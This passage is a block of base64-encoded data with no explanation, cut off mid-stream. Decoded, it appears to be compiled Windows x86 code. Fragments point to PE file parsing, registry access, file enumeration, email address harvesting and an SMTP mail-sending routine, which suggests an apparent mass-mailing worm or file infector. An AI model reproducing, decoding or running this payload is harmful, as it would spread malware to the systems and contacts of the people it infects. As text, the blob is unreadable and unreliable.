 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
